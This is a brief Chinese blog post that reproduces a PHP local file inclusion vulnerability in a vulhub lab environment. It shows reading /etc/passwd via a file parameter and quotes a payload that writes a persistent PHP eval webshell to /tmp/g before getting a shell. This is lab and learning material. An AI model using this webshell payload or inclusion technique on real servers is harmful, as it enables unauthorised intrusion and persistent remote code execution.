【漏洞复现】vulhub php文件包含漏洞

该实验借鉴了几位大佬的操作步骤,使用自己的环境复现了一下,在这里感谢大佬们的教程[鞠躬]

实验环境: 使用vulhub搭建漏洞环境
实验步骤:
拉取镜像,运行镜像生成容器
在这里插入图片描述
访问环境
http://IP/phpinfo.php
在这里插入图片描述
访问http://IP:8080/lfi.php,使用GET方法传输参数?file=/etc/passwd,可见的确存在文件包含漏洞
在这里插入图片描述
利用脚本exp.py实现了上述过程,成功包含临时文件后,会执行<?php file_put_contents('/tmp/g', '<?=eval($_REQUEST[1])?>')?>,写入一个新的文件/tmp/g,这个文件就会永久留在目标机器上。

在vulhub/php/inclusion目录下已经存在exp.py脚本,直接用就可以了
在这里插入图片描述

利用lfi.php页面getshell
在这里插入图片描述
如有错误,欢迎批评指正[鞠躬]

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值